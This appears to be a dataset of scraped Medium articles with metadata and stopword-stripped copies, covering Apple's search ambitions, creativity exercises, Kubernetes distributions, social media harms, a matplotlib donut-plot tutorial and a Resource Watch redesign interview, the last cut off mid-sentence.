httpsmediumcompythoninplainenglishtacklingkagglesmercedesbenzgreenermanufacturingcompetitionwithpythonecbd2714d952 Twitter httpstwittercombobmcdear GitHub httpsgithubcombobmcdearTags Machine Learning Artificial Intelligence AI Data Science Data Visualization
3,806
How Apple Can Make Money Through a Search Engine
OPINION How Apple Can Make Money Through a Search Engine How Apple can make up for losing $12 Billion Created with Canva Design Congress wants to break Google, claiming it has illegally thrashed the competition in the search engine market. Google dominates the market with an 86.86% market share as of July 2020. The argument is that Google pays billions of dollars to other companies to become the default search engine for its consumers. In 2019, Google paid $30bn for “traffic acquisition costs”, almost a third of its entire search revenue. This was up from $26.7bn the previous year, and up from just $6.2bn a decade earlier. Google reportedly paid $12 Billion to Apple to make Google the default search engine on Safari for iPhones. This means that if Google is regulated, Apple would lose around $12 Billion each year, which amounts to 1/5 of all its services revenue. Apple depends on Google, and their ties can be cut anytime. As an alternative, Apple is rumored to be working on its own search engine — Apple Search. So, how Apple plans to monetize it and make up for $12 Billion?
https://medium.com/datadriveninvestor/how-apple-can-make-money-through-a-search-engine-12e018a58154
['Shubh Patni']
2020-11-14 14:06:37.266000+00:00
['Technology', 'Google', 'Apple', 'Innovation', 'Business']
Title Apple Make Money Search EngineContent OPINION Apple Make Money Search Engine Apple make losing 12 Billion Created Canva Design Congress want break Google claiming illegally thrashed competition search engine market Google dominates market 8686 market share July 2020 argument Google pay billion dollar company become default search engine consumer 2019 Google paid 30bn “traffic acquisition costs” almost third entire search revenue 267bn previous year 62bn decade earlier Google reportedly paid 12 Billion Apple make Google default search engine Safari iPhones mean Google regulated Apple would lose around 12 Billion year amount 15 service revenue Apple depends Google tie cut anytime alternative Apple rumored working search engine — Apple Search Apple plan monetize make 12 BillionTags Technology Google Apple Innovation Business
3,807
How to Unleash Your Creativity in 30 Minutes a Day
Give some of the following methods a shot for 30 minutes each day to release your creativity: Nostalgia to the rescue! Harken back to your childhood. Did you have an active imagination? When I was in 3rd grade my teacher, Mrs. Bermudez gave myself and two friends all the extra worksheets she had left over from the year. We took possibly three bags of school work home. I set out to be a teacher. I arranged my teddy bears and dolls, made desks of cardboard boxes, and set out to teach. I did the assignments (since teddy bears cannot write), and pretended to grade their work. The interesting fact? I am a teacher who works with men and women educating them on domestic violence and anger management. Who knew a creative side would turn into a real life career move? Maybe you pretended you were a teacher or a doctor. Or, you thought you were a grand hero, like Spider-man or a famous hunter, playing in the woods. Perhaps you played as if you were the greatest skateboarder or a champion football player. Borrowing different personas is a fun way to show your creativity. Right now, imagine yourself as a successful and talented worker at your current profession. What would you wear? What about behaviors, your style, or your hairdo? What would you communicate to others or to the media? How would you relate? Visualize that you’re the greatest at something you enjoy doing for at least 10 minutes each day. If you can see it, you can achieve it. What are you good at? Imagination is powerful. As you develop the skills of creativity, you’ll find the ability to focus on what you excel at and what you’ve accomplished. Do you have specific skills or talents which you thrive in discussing? For the next 10, 20, or 30 minutes, consider your various skills, talents, and knowledge base. After your mind has toyed with the ideas, pick one skill to focus upon with intention. What makes you shine with particular ability you chose? Are you focused and follow instructions well? What about listening skills or speaking skills? If you noticed what others say, or feel when they share their thoughts, you can write about the way you are impacted. You quickly pick up on what’s expected of you. Consider if you find yourself internally motivated to accomplish jobs in a timely manner, or you can find ways to improve work performance. Take some time to write out how you create time saving documents or lists. When you know what you excel at, you feel confident. And when you’re confident, you’re not afraid to try new things and experiment (which are aspects of being creative). Let your mind fantasize about anything amazing in your life. My brother used to dream about buying an expansive house on the hill in Washington State. He’d tell me what he would do and how he’d have a room just for model making. Maybe, you’ll thrive with dreaming about a love relationship. Give yourself 30 minutes to sit back and dream. Imagine what the inside of the house looks like. Consider where you’d have a craft room, or even a holiday feast. Picture the face of a potential mate. Imagine what your first encounter would be and what you will wear to meet them. Create and laminate an index card for your pocket. On the index card, write your top 3 life goals. Keep the card in an easy place to take out and look at when you have a few minutes. The concept here is to remind yourself of the goals and dreams you have. Your future self needs to be reminded in the present of what you love, long for, and plan to accomplish. Ponder how you want to achieve the goals. Savor the victory. Cherish the wish. And visualize yourself arriving with accolades of honor. Remember, you hold the creative power to pursue every goal. You decide the process. Let your mind run free. Consider the following questions: what can you do today, tomorrow, next week, and next month to go after your goals? What mini steps can you take today to get you headed toward tomorrow’s success? Take massive action to head toward your dreams. Role models help us grow. Identify someone you admire or hold in high regard. I enjoy the research involved in studying about famous psychologists, neurologists, or criminal forensic scientists. The ideas they present inspire my work with the justice system helping prevent violence. As I consider their history, I success, and focus I become inspired to keep pursuing the dreams. Ask yourself, what is it about them you like? How would your life improve if you acted or believed as they do? Sometimes the personality or the traits we see in others makes us feel happy, or content. If we were to act as if we had the same trait we’d begin to demonstrate the same behaviors. Usually if you are around someone for 10 minutes a day, you’ll start acting like the person. Be mindful who you study! For the next month, emulate the characteristic you admire. Maybe Joe gets to work on time, has a positive attitude, and tackles the job without criticizing the managers or leaders. As you notice the different characteristics of Joe, you may start to emulate him by ceasing negative self-talk about the leadership team, even if you feel justified. Find a way to look at the good around you and share what you see. Trying on new personal characteristics allows you to stretch yourself creatively to see what you can do. Try something new. Experiment with a new creative activity. Explore arts and craft stores: buy a block of clay, a jewelry-making kit, or some paints and canvases. Look on Pinterest for ideas of Do-It-Yourself creative ideas. Find a way to incorporate the artistic side once a week into your schedule. As we cultivate creativity we build an artistic side to us we may have not realized in the past. · One of the benefits of setting a time (30 minutes), limit on the project, means you do not have to complete it all in one setting. It’s possible you’ll spend over the half-hour mark, however, it’s the creativity you are looking at, not necessarily the time. Your skills will expand, and your time for ‘away’ from work activities becomes an event you look forward to. Art or creative craft classes at local stores may be perfect to get you interested. Sometimes they are classes you take once, and then move on, or at other times they are several weeks, once a day. Start with what feels comfortable for you. As you build creativity in your life, you’ll begin to feel the imagination take off. Working with your hands and mind together opens up new avenues. Release the innovator inside. Delve into 30 minutes of pure invention-focused growth. When you focus your energy on any of the above strategies, or connect 2 or 3 of them together you’ll find yourself developing a new set of coping strategies, reducing stress, becoming and building resourcefulness, as well as connecting with the younger version of you. Believe in yourself. You are a creative individual. As you feel more confident, you’ll prove you have talent. Take the time to do something which cultivates your imagination and originality either daily or weekly. As I consider my favorite artist side, I realize I have let it slide too much and need to return to my first love: the arts. Maybe, after you read the above article, you too want to delve in and explore a side of you not yet found, or one which lays dormant under the surface of hustle and bustle. I encourage you to step up and find the artist inside! ~Just at thought by Pamela
https://medium.com/change-your-mind/how-to-unleash-your-creativity-in-30-minutes-a-day-44160ec32737
['Pamela J. Nikodem']
2020-11-21 11:02:37.873000+00:00
['Self', 'Mental Health', 'Growth', 'Creativity', 'Art']
Title Unleash Creativity 30 Minutes DayContent Give following method shot 30 minute day release creativity Nostalgia rescue Harken back childhood active imagination 3rd grade teacher Mrs Bermudez gave two friend extra worksheet left year took possibly three bag school work home set teacher arranged teddy bear doll made desk cardboard box set teach assignment since teddy bear cannot write pretended grade work interesting fact teacher work men woman educating domestic violence anger management knew creative side would turn real life career move Maybe pretended teacher doctor thought grand hero like Spiderman famous hunter playing wood Perhaps played greatest skateboarder champion football player Borrowing different persona fun way show creativity Right imagine successful talented worker current profession would wear behavior style hairdo would communicate others medium would relate Visualize you’re greatest something enjoy least 10 minute day see achieve good Imagination powerful develop skill creativity you’ll find ability focus excel you’ve accomplished specific skill talent thrive discussing next 10 20 30 minute consider various skill talent knowledge base mind toyed idea pick one skill focus upon intention make shine particular ability chose focused follow instruction well listening skill speaking skill noticed others say feel share thought write way impacted quickly pick what’s expected Consider find internally motivated accomplish job timely manner find way improve work performance Take time write create time saving document list know excel feel confident you’re confident you’re afraid try new thing experiment aspect creative Let mind fantasize anything amazing life brother used dream buying expansive house hill Washington State He’d tell would he’d room model making Maybe you’ll thrive dreaming love relationship Give 30 minute sit back dream Imagine inside house look like Consider you’d craft room even holiday feast Picture face potential mate Imagine first encounter would wear meet Create laminate index card pocket index card write top 3 life goal Keep card easy place take look minute concept remind goal dream future self need reminded present love long plan accomplish Ponder want achieve goal Savor victory Cherish wish visualize arriving accolade honor Remember hold creative power pursue every goal decide process Let mind run free Consider following question today tomorrow next week next month go goal mini step take today get headed toward tomorrow’s success Take massive action head toward dream Role model help u grow Identify someone admire hold high regard enjoy research involved studying famous psychologist neurologist criminal forensic scientist idea present inspire work justice system helping prevent violence consider history success focus become inspired keep pursuing dream Ask like would life improve acted believed Sometimes personality trait see others make u feel happy content act trait we’d begin demonstrate behavior Usually around someone 10 minute day you’ll start acting like person mindful study next month emulate characteristic admire Maybe Joe get work time positive attitude tackle job without criticizing manager leader notice different characteristic Joe may start emulate ceasing negative selftalk leadership team even feel justified Find way look good around share see Trying new personal characteristic allows stretch creatively see Try something new Experiment new creative activity Explore art craft store buy block clay jewelrymaking kit paint canvas Look Pinterest idea DoItYourself creative idea Find way incorporate artistic side week schedule cultivate creativity build artistic side u may realized past · One benefit setting time 30 minute limit project mean complete one setting It’s possible you’ll spend halfhour mark however it’s creativity looking necessarily time skill expand time ‘away’ work activity becomes event look forward Art creative craft class local store may perfect get interested Sometimes class take move time several week day Start feel comfortable build creativity life you’ll begin feel imagination take Working hand mind together open new avenue Release innovator inside Delve 30 minute pure inventionfocused growth focus energy strategy connect 2 3 together you’ll find developing new set coping strategy reducing stress becoming building resourcefulness well connecting younger version Believe creative individual feel confident you’ll prove talent Take time something cultivates imagination originality either daily weekly consider favorite artist side realize let slide much need return first love art Maybe read article want delve explore side yet found one lay dormant surface hustle bustle encourage step find artist inside thought PamelaTags Self Mental Health Growth Creativity Art
3,808
You had a lot to say this week
I love when I can read someone else’s work and feel the energy of the piece. It’s like the words are lightning bolts that leap off the page and charge my mind. That feeling happened a lot this week and our writers are to thank. They delivered moving monologues on love, fear, absence and guilt. Here’s what you missed: I also jumped in the mix this week with a piece titled Chaos and Creativity. It’s a short think piece on our ability to create through strained conditions. We already have more stories coming in so next week promises to be equally as inspiring. Keep submitting. We’re staying open to submissions over the holidays so if you feel like you have something to say, say it. We’ll publish it.
https://medium.com/cry-mag/you-had-a-lot-to-say-this-week-a6246e939852
['Kern Carter']
2020-12-12 12:46:45.529000+00:00
['Newsletter', 'Fear', 'Creativity', 'Love', 'Writing']
Title lot say weekContent love read someone else’s work feel energy piece It’s like word lightning bolt leap page charge mind feeling happened lot week writer thank delivered moving monologue love fear absence guilt Here’s missed also jumped mix week piece titled Chaos Creativity It’s short think piece ability create strained condition already story coming next week promise equally inspiring Keep submitting We’re staying open submission holiday feel like something say say We’ll publish itTags Newsletter Fear Creativity Love Writing
3,809
Kubernetes Distributions — What Are They?
Kubernetes Distributions — What Are They? Learn what they are and why it matters to you Photo by Drew Beamer on Unsplash One of the biggest announcements from the latest AWS re:Invent 2020 sessions were the release of EKS-D from Amazon. EKS-D is their open-source Kubernetes distribution that’s now available for everyone to start using in their cloud provider or even on premises. It’s based on past findings and the entire process Amazon has undergone in managing their Kubernetes managed platform, Amazon EKS. These announcements have many people asking themselves: “OK, I know Kubernetes, but what’s a Kubernetes distribution? And why should I care?” So I’ll try to answer that with the knowledge I have, and I always try to use the same approach: a Kubernetes versus Linux model comparison. Kubernetes is an open-source project, as you know, started by Google and now being managed by the community and the Cloud Native Computing Foundation (CNCF), and you can find all the code available here: But let’s be honest: Not many of us are pulling that repo and trying to compile it to provide a cluster. That’s not how we usually work. If you follow the code path — downloading it, building it, and so on — this is usually named vanilla Kubernetes. If we start with the Linux comparison, it’s the same situation as we have with the Linux kernel that most of the Linux distribution ships, but this is already compiled and available with a bunch of other tools all working together via the usual approach. So that’s what a Kubernetes distribution is. They build Kubernetes. They provide other tools and components to enhance or provide more features and to focus on additional aspects like a security focus, a DevOps focus, or another focus. Another concept that usually is raised is the purity of distribution, and we try to talk about distribution that’s pure. We call a distribution pure when it’s building Kubernetes, and that’s it. It leaves everything else to the developers or users to decide what they want to use on top of it.
https://medium.com/better-programming/kubernetes-distributions-what-are-they-be2c438c8706
['Alex Vazquez']
2020-12-28 16:38:12.254000+00:00
['Software Development', 'AWS', 'Kubernetes', 'Containers', 'Programming']
Title Kubernetes Distributions — TheyContent Kubernetes Distributions — Learn matter Photo Drew Beamer Unsplash One biggest announcement latest AWS reInvent 2020 session release EKSD Amazon EKSD opensource Kubernetes distribution that’s available everyone start using cloud provider even premise It’s based past finding entire process Amazon undergone managing Kubernetes managed platform Amazon EKS announcement many people asking “OK know Kubernetes what’s Kubernetes distribution care” I’ll try answer knowledge always try use approach Kubernetes versus Linux model comparison Kubernetes opensource project know started Google managed community Cloud Native Computing Foundation CNCF find code available let’s honest many u pulling repo trying compile provide cluster That’s usually work follow code path — downloading building — usually named vanilla Kubernetes start Linux comparison it’s situation Linux kernel Linux distribution ship already compiled available bunch tool working together via usual approach that’s Kubernetes distribution build Kubernetes provide tool component enhance provide feature focus additional aspect like security focus DevOps focus another focus Another concept usually raised purity distribution try talk distribution that’s pure call distribution pure it’s building Kubernetes that’s leaf everything else developer user decide want use top itTags Software Development AWS Kubernetes Containers Programming
3,810
Don’t Sell Your Emotions on Social Media
Before reading the article, I would like it if you take some time and think about the changes in your social and professional behavior since you have started using social media. Have you got anything? No! Don’t worry. Take a long breath and start reading the article. “THE TECHNOLOGY THAT CONNECTS US, ALSO CONTROLS US.” — Social Dilemma Social media isn’t a tool that’s just waiting to be used. It has its own goals and it has its own means of pursuing them. There are 3.81 billion social media users in the world with an increase of 9.2% users every year. Have you ever think why there is so much user engagement on these social platforms? Everyone is fascinated by social media features. It helps in making the users feel involved. It helps to stay in touch with what my friends are doing, to stay up-to-date with news and current events, to increase general networking with people, to find funny and entertaining content, to share photos & videos with others, to share your opinion on any current issue, and many more. “But what if I tell, you are nothing but a product to sell for the social media!!”. Now you can question me how you are claiming us to be the product? The simple answer is ‘Data’, I don’t know whether you are aware of the facts or not, the AI techniques that are integrated into these social media platforms monitor your smallest to smallest action like an engagement time on a particular post, type of post that you liked, shared or commented, your reaction on the post your friend liked or shared, what’s trending in your area respective to the GPS location, types of accounts you search for or follow them. Collecting all this data, media giants understand your interests, likes, dislikes, perceptions, motives, nature, and most importantly your emotions. Now if I would like to summarize what I stated until now, then I would say, “YOU ARE TRAPPED!!” Photo by Artyom Kim on Unsplash I think you got a glimpse of an idea about the objective of the article. Let’s divide the article into two parts now, first why I said you are the product to sell? and second, why I exclaimed you are trapped!! The complex to complex algorithms designed by the expertise in social media giants totally worked on the data you provide them on your clickable actions and post engagements. Consider a situation where you are liking animal posts continuously 10–12 times, then a human will easily figure out that you are fond of animals but what in the case of machines? Analyzing the data, understanding your behavior, finding out the patterns, and test the learnings with your emotions. That’s how they build the predictive models, forecast the outcomes, and get constantly updated with the new data. Now just think, I am running a company that deals with the manufacturing of gym types of equipment and sells in the market. Now I want help from social media, so I sponsor an ad just like say on Instagram charged of a certain amount and hoping for high customer engagement. Now think, you live near my company’s location and you are a fitness freak that Instagram knows. Then of course you will get the ad on your Instagram feed and will manipulate you to buy the types of equipment and if in case you are looking for some cool stuff and you like the products mentioned in the ad then you will sure to purchase it and obviously, I will say I got a new a customer. “That’s great! How cool is social media!” Now again you can question me that what’s the wrong deal about this, after all, I got what I want. It’s of my interest so it’s good that I purchased it. But deeper down when you will think about it, you will understand that social media sold you because you are the perfect customer for that type of product. Instagram knows you have liked this much count of fitness posts, you follow fitness influencers, you share fitness posts and many more. That’s where your interests play a vital role. They are utilizing your data to suggest the best possible recommendations and in return, you can't restrict yourself to purchase it. That’s the same predictive modeling is used in maintaining your social media feeds where you get videos recommendations, post referrals, or product ads based on your interest and indirectly they force you to involve in these things and spend more time scrolling the posts, buying the items which in turn make huge revenues for them. The recommendation engines are that much capable to keep track of your every action and updating the suggestions continuously so that you can’t able to detach it from yourself. You repeatedly scroll your feed and keep the flow on. Whenever we search for a product on e-commerce sites, after viewing 2–3 items we get the same product ad on our social media feed, email, etc. They are playing with your mindset, they push notifications after a certain interval of time so that their ultimate goal of keeping you involved is achieved and lastly you will be get manipulated to purchase that product. Coming back to my second exclamation, You are trapped!! Excess of anything is harmful if you are unable to feel it at present then for sure you will experience it in the future. I would like to share some social media facts which will disturb you for sure. Photo by Sydney Sims on Unsplash 95% of social media using teens have witnessed cruel behavior on social networking sites. of social media using teens have witnessed In the world, 80% of teens use Facebook , and 54% of those experienced cyberbullying. of teens use , and of those experienced 9X higher chances of identity fraud . . Engaging in dangerous & harmful activities including reckless behavior, substance abuse, or self-injury. including reckless behavior, substance abuse, or self-injury. Higher risk of depression , trouble in sleeping , ongoing sadness , losing interest from favorite activities. , trouble in , ongoing , losing interest from favorite activities. Sharing of inappropriate content/misinformation distribution. distribution. Relationship threats , abuse, intimidation, faking perfection , social comparison, and self-esteem increase. , abuse, intimidation, , social comparison, and self-esteem increase. 140–150 mins daily time spent on social networking sites worldwide. 39,757 years collectively spent per day on FACEBOOK . daily time spent on social networking sites worldwide. collectively spent per day on . 25% of the users have admitted to being distracted during intimacy . 14% have risked their own safety. of the users have admitted to being distracted during . have risked their own safety. According to MIT Research , fake news spread 6 times faster than real news on Twitter . , news spread faster than news on . 62% of the population worldwide confesses to believing fake news. of the population worldwide confesses to believing fake news. 89% of Americans believe that social media is responsible for spreading misinformation. of Americans believe that social media is for spreading misinformation. 29% of the population deleted/removed social media accounts because they felt overloaded by it. of the population because they by it. The Prime Minister of India Narendra Modi has 60% of fake followers on Twitter while US President Donald Trump has 37% and Congress Party Member Rahul Gandhi has 69% of fake followers on Twitter. Social media growth in India, which has risen from 137 million to over 600 million in 2019 leads to fake news distribution (230 million Whatsapp users highest in any country). There are only two industries that call their customer’s ‘USERS’: ILLEGAL DRUGS & SOFTWARE Now after reading all these facts, just ask yourself where you are using these social media platforms effectively or rising problems for yourself. If we think about fake news distribution, we can’t trust anyone who is sharing real news. If we think of a social comparison, we can’t decide whether the guidance of any person will be beneficial for us or not. If we think about relationships, we never know when we will get disheartened and that will lead to depression and anxiety. Social media is an unauthorized spy who knows everything about you like interests, mental condition, week plan, location, birthday, relationship, health, habits, next food order, visits, mentor, success, failures, and many more things that you also don’t know about yourself. “Social media is training us to compare our lives, instead of appreciating everything we are. No wonder why everyone is always depressed”. — Bill Murray S haring our data is our responsibility, what to share, when to share, how to share, why to share, whom to share all these things will be responsible for your future actions. Photo by Ross Findon on Unsplash In the end, I request you it’s a social life please don’t make it so much personnel. Don’t post your feelings. Don’t share your emotions. This is not the kind of world where you think I will get genuine advice from others, Nooo! don’t expect this from social media. There are so many people gonna judge you based on your post engagements, make perceptions on it but you just want to trick them. Enjoy your weekend fully social media free, spent time with the loved ones, and invest time in your favorite activities. Finally, I will suggest you think about your current situation and work on your mentality to utilize such social media platforms in a more effective way so that it will help in your potential growth. Don’t use social media to impress people, utilize it to impact people. I hope this article brings out a valuable change in your social & personnel life. Thanks for reading the article. Now it’s up to you, choose wisely.
https://medium.com/plus-marketing/dont-sell-your-emotions-on-social-media-6079735e2dc6
['Amey Band']
2020-11-20 13:26:12.067000+00:00
['AI', 'Social Media', 'Emotional Intelligence', 'Instagram', 'Facebook']
Title Don’t Sell Emotions Social MediaContent reading article would like take time think change social professional behavior since started using social medium got anything Don’t worry Take long breath start reading article “THE TECHNOLOGY CONNECTS US ALSO CONTROLS US” — Social Dilemma Social medium isn’t tool that’s waiting used goal mean pursuing 381 billion social medium user world increase 92 user every year ever think much user engagement social platform Everyone fascinated social medium feature help making user feel involved help stay touch friend stay uptodate news current event increase general networking people find funny entertaining content share photo video others share opinion current issue many “But tell nothing product sell social media” question claiming u product simple answer ‘Data’ don’t know whether aware fact AI technique integrated social medium platform monitor smallest smallest action like engagement time particular post type post liked shared commented reaction post friend liked shared what’s trending area respective GPS location type account search follow Collecting data medium giant understand interest like dislike perception motif nature importantly emotion would like summarize stated would say “YOU TRAPPED” Photo Artyom Kim Unsplash think got glimpse idea objective article Let’s divide article two part first said product sell second exclaimed trapped complex complex algorithm designed expertise social medium giant totally worked data provide clickable action post engagement Consider situation liking animal post continuously 10–12 time human easily figure fond animal case machine Analyzing data understanding behavior finding pattern test learning emotion That’s build predictive model forecast outcome get constantly updated new data think running company deal manufacturing gym type equipment sell market want help social medium sponsor ad like say Instagram charged certain amount hoping high customer engagement think live near company’s location fitness freak Instagram know course get ad Instagram feed manipulate buy type equipment case looking cool stuff like product mentioned ad sure purchase obviously say got new customer “That’s great cool social media” question what’s wrong deal got want It’s interest it’s good purchased deeper think understand social medium sold perfect customer type product Instagram know liked much count fitness post follow fitness influencers share fitness post many That’s interest play vital role utilizing data suggest best possible recommendation return cant restrict purchase That’s predictive modeling used maintaining social medium feed get video recommendation post referral product ad based interest indirectly force involve thing spend time scrolling post buying item turn make huge revenue recommendation engine much capable keep track every action updating suggestion continuously can’t able detach repeatedly scroll feed keep flow Whenever search product ecommerce site viewing 2–3 item get product ad social medium feed email etc playing mindset push notification certain interval time ultimate goal keeping involved achieved lastly get manipulated purchase product Coming back second exclamation trapped Excess anything harmful unable feel present sure experience future would like share social medium fact disturb sure Photo Sydney Sims Unsplash 95 social medium using teen witnessed cruel behavior social networking site social medium using teen witnessed world 80 teen use Facebook 54 experienced cyberbullying teen use experienced 9X higher chance identity fraud Engaging dangerous harmful activity including reckless behavior substance abuse selfinjury including reckless behavior substance abuse selfinjury Higher risk depression trouble sleeping ongoing sadness losing interest favorite activity trouble ongoing losing interest favorite activity Sharing inappropriate contentmisinformation distribution distribution Relationship threat abuse intimidation faking perfection social comparison selfesteem increase abuse intimidation social comparison selfesteem increase 140–150 min daily time spent social networking site worldwide 39757 year collectively spent per day FACEBOOK daily time spent social networking site worldwide collectively spent per day 25 user admitted distracted intimacy 14 risked safety user admitted distracted risked safety According MIT Research fake news spread 6 time faster real news Twitter news spread faster news 62 population worldwide confesses believing fake news population worldwide confesses believing fake news 89 Americans believe social medium responsible spreading misinformation Americans believe social medium spreading misinformation 29 population deletedremoved social medium account felt overloaded population Prime Minister India Narendra Modi 60 fake follower Twitter US President Donald Trump 37 Congress Party Member Rahul Gandhi 69 fake follower Twitter Social medium growth India risen 137 million 600 million 2019 lead fake news distribution 230 million Whatsapp user highest country two industry call customer’s ‘USERS’ ILLEGAL DRUGS SOFTWARE reading fact ask using social medium platform effectively rising problem think fake news distribution can’t trust anyone sharing real news think social comparison can’t decide whether guidance person beneficial u think relationship never know get disheartened lead depression anxiety Social medium unauthorized spy know everything like interest mental condition week plan location birthday relationship health habit next food order visit mentor success failure many thing also don’t know “Social medium training u compare life instead appreciating everything wonder everyone always depressed” — Bill Murray haring data responsibility share share share share share thing responsible future action Photo Ross Findon Unsplash end request it’s social life please don’t make much personnel Don’t post feeling Don’t share emotion kind world think get genuine advice others Nooo don’t expect social medium many people gonna judge based post engagement make perception want trick Enjoy weekend fully social medium free spent time loved one invest time favorite activity Finally suggest think current situation work mentality utilize social medium platform effective way help potential growth Don’t use social medium impress people utilize impact people hope article brings valuable change social personnel life Thanks reading article it’s choose wiselyTags AI Social Media Emotional Intelligence Instagram Facebook
3,811
Donut Plot with Matplotlib (Python)
Donut Plot with Matplotlib (Python) Let’s start by praising visualizations with a very famous English language adage. It’s cliche but dead on. “A picture is worth a thousand words” In this post, I’ll demonstrate how to create a donut plot using matplotlib with python. Donut plot is a very efficient way of comparing stats of multiple entities. As per [1] Just like a pie chart, a doughnut chart shows the relationship of parts to a whole, but a doughnut chart can contain more than one data series. Each data series that you plot in adoughnut chart adds a ring to the chart. Now let’s use the following dummy data representing the usage of mobile applications of different social media websites. ╔═════════════════╦══════════╗ ║ Social Media ║ Usage ║ ╠═════════════════╬══════════╣ ║ Twitter ║ 60 % ║ ║ Facebook ║ 75 % ║ ║ Instagram ║ 80 % ║ ╚═════════════════╩══════════╝ Following is the code for creating a donut plot. import pandas as pd import re data = pd.read_csv('testdata.csv') print(data.head()) import matplotlib.pyplot as plt # create donut plots startingRadius = 0.7 + (0.3* (len(data)-1)) for index, row in data.iterrows(): scenario = row["scenario"] percentage = row["Percentage"] textLabel = scenario + ' ' + percentage print(startingRadius) percentage = int(re.search(r'\d+', percentage).group()) remainingPie = 100 - percentage donut_sizes = [remainingPie, percentage] plt.text(0.01, startingRadius + 0.07, textLabel, horizontalalignment='center', verticalalignment='center') plt.pie(donut_sizes, radius=startingRadius, startangle=90, colors=['#d5f6da', '#5cdb6f'], wedgeprops={"edgecolor": "white", 'linewidth': 1}) startingRadius-=0.3 # equal ensures pie chart is drawn as a circle (equal aspect ratio) plt.axis('equal') # create circle and place onto pie chart circle = plt.Circle(xy=(0, 0), radius=0.35, facecolor='white') plt.gca().add_artist(circle) plt.savefig('donutPlot.jpg') plt.show() Donut Plot On the very core, donut plot here in this code is being created by creating a series of pie charts of different radiuses one on top of the other with a white circle in the center. References [1] https://support.office.com/en-us/article/present-your-data-in-a-doughnut-chart-0ac0efde-34e2-4dc6-9b7f-ac93d1783353
https://towardsdatascience.com/donut-plot-with-matplotlib-python-be3451f22704
['Asad Mahmood']
2019-06-12 22:17:54.482000+00:00
['Data Sceince', 'Matplotlib', 'Python', 'Data Visualization']
Title Donut Plot Matplotlib PythonContent Donut Plot Matplotlib Python Let’s start praising visualization famous English language adage It’s cliche dead “A picture worth thousand words” post I’ll demonstrate create donut plot using matplotlib python Donut plot efficient way comparing stats multiple entity per 1 like pie chart doughnut chart show relationship part whole doughnut chart contain one data series data series plot adoughnut chart add ring chart let’s use following dummy data representing usage mobile application different social medium website ╔═════════════════╦══════════╗ ║ Social Media ║ Usage ║ ╠═════════════════╬══════════╣ ║ Twitter ║ 60 ║ ║ Facebook ║ 75 ║ ║ Instagram ║ 80 ║ ╚═════════════════╩══════════╝ Following code creating donut plot import panda pd import data pdreadcsvtestdatacsv printdatahead import matplotlibpyplot plt create donut plot startingRadius 07 03 lendata1 index row dataiterrows scenario rowscenario percentage rowPercentage textLabel scenario percentage printstartingRadius percentage intresearchrd percentagegroup remainingPie 100 percentage donutsizes remainingPie percentage plttext001 startingRadius 007 textLabel horizontalalignmentcenter verticalalignmentcenter pltpiedonutsizes radiusstartingRadius startangle90 colorsd5f6da 5cdb6f wedgepropsedgecolor white linewidth 1 startingRadius03 equal ensures pie chart drawn circle equal aspect ratio pltaxisequal create circle place onto pie chart circle pltCirclexy0 0 radius035 facecolorwhite pltgcaaddartistcircle pltsavefigdonutPlotjpg pltshow Donut Plot core donut plot code created creating series pie chart different radius one top white circle center References 1 httpssupportofficecomenusarticlepresentyourdatainadoughnutchart0ac0efde34e24dc69b7fac93d1783353Tags Data Sceince Matplotlib Python Data Visualization
3,812
How we made Resource Watch even easier to use.
Design and user research go hand in hand when it comes to product development. Both are essential if you want to make a product that is useful, usable, and used. We’ve been working with the Resource Watch team at World Resources Institute (WRI) on a redesign that makes planetary data easier to use. I spoke with Dani Caso (Designer) and Martin Dubuisson (User Researcher) to find out more. So, why did Resource Watch get a redesign? Dani: User research done by Martin revealed several things that we could improve in terms of the user experience on Resource Watch. Rather than taking each problem one by one and finding isolated solutions, we decided it made more sense to reconfigure the whole space. Martin: The Explore page — a sort of library of open-source global datasets that can be accessed and visualized on a map — is really the core offering of Resource Watch. Over the years the page has hosted a growing number of datasets on a vast array of different topics. In our conversation with users, many had described the Explore page as “overwhelming”. Yes, they can search for datasets in the search bar, but some users weren’t sure which words they should type or which datasets are available. Our main challenge was to represent the breadth of the data, invite exploration, and inspire (which are key elements of the value proposition to our users). While at the same time providing users with quick access to the datasets they are searching for. In addition to that, we also took advantage of this redesign to tackle a number of other changes, based on needs detected from our previous testing. For example, these included making it easier for users to customise their experience, and removing misleading redirections. We made a conscious decision to work very closely with the Resource Watch team at WRI. We carried out some interviews together, and involved the whole team in a co-analysis session. We asked them to review some recordings of the user testing so that we could discuss them in-depth and cross-reference our interpretations. This was a fun exercise, and more importantly, it helped ensure that the key learnings about users wouldn’t simply end up in a one-directional presentation (and therefore probably quickly forgotten about). Instead, this approach meant that our user insights were built and absorbed by everyone on the team. Members of WRI’s Resource Watch team came to our Madrid office for a co-analysis session where we discussed the findings of the user research in more detail. What information did you use to develop the new design for Resource Watch? Dani: Knowing who your users are and what they need is the first and most important piece of information you need when designing a data platform. Martin’s research told us that policymakers, journalists, and educators were the three key users of Resource Watch. The conversations with people from these three groups also told us that there’s a wide range of experience and knowledge level that we need to cater for. We needed a design that would make the Resource Watch data accessible and usable for all of them. Our goal was to provide the tools that someone needs to be a great analyst. If you’re not an expert on climate data, you’ll need some guidance. If you are a climate data expert, you’ll want the fastest entry point to the most relevant data. When I pitched this approach to WRI, I used the Pixar movie ‘Ratatouille’ as a reference. In that movie, a stuck-up food critic learns that anyone can become a great cook if you give them tools (or a good cook book!) to work with. Our aim is the same with Resource Watch. We’re giving every chef the tools they need to create delicious dishes of data. Martin: On most of our projects, we try to gather as much information as possible about a situation before making decisions. In this case, our main approach was to carry out user testing — showing the new designs to users, hearing their feedback, and analyzing their behavior and words. But we also had a look at quantitative sources too: we looked at Google Analytics (website analytics to get large scale statistics on user behavior), to know, for example, more about the keywords that users enter when doing a search on Resource Watch. Over the years, we’ve developed a more solid understanding of our users. So, we’ve been revisiting our conclusions from previous user testings, to make sure we build on previous blocks of knowledge and gain an increasingly accurate picture. How do you simplify things without losing information? Dani: You simplify things by having everything in order. That doesn’t mean you need to get rid of things. You simply reorganise what you have. It’s like tidying your house and choosing where to put things. You probably won’t throw anything away, but you will put things in places that make them easier to find when you need them. Martin: As a user researcher, it’s my role to find the barriers that block people from finding the information they want. Once we find them, Dani uses design to take them away. Something that our user research team has noticed over and over in many projects, is that most people don’t bother reading long texts — or even long paragraphs — for example those that describe the datasets. Now, this might not come as a big surprise to most of you, we’ve all heard that attention spans are getting shorter. But in most of our projects — where many of our users have scientific backgrounds — we had assumed that they would be keen on reading all the details. Truth is: many science-minded people skim read too, or they just want to go straight to the point. Which means, more often than not, just a few well-worded, well-placed bullet points will do! The design can always include a 